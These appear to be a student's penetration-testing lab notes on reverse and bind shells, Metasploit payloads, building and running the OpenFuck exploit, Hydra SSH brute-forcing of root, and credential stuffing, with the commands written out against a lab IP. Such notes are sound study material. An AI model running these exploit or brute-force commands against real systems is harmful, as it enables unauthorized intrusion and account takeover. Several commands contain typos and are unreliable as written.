Reverse Shells vs Bind Shells
The most common shell is a reverse shell.
A shell is access to a machine. Popping a shell means getting access to a machine. A reverse means, a target machine connects to us.
With the bind we open up a port on the target machine and we connect to it.
Reverse shells are more common. (95%)
Bind shells are typical to external assesments.
Staged vs Non-Staged Payloads
A payload is what we run as an exploit.
The ‘/’ (forward slash) identifies a staged payload.
Gaining Root with Metasploit
set rhosts 192.168.57
Session dies. (staged payload)
set payload linux/x86/sell_reverse_tcp
(set non-staged payload)
1, Download OpenFuck.c
git clone https://github.com/heltonWernik/OpenFuck.git
2, Install ssl-dev library
apt-get install libssl-dev
3, It’s Compile Time
gcc -o OpenFuck OpenFuck.c -lcrypto
4, Running the Exploit
./open 0x6b 192.168.57.134 -c 40
Brute Force Attacks
Bruteforcing SSH is typically not the low hanging fruit.
Still, there are three reasons for trying it:
- Testing passwords strength
- Test if we can get in with a week or default password
- Testing how well the blue team performs
Hydra is a bruteforce tool.
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.57.134:22 -t 4 -V
set username root
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
set rhosts 192.168.57.134
Credential Stuffing and Password Spraying
Credential stuffing is injecting account breached credentials in hopes of account takeover.
Look for status change in the results.
Add response text to grep match.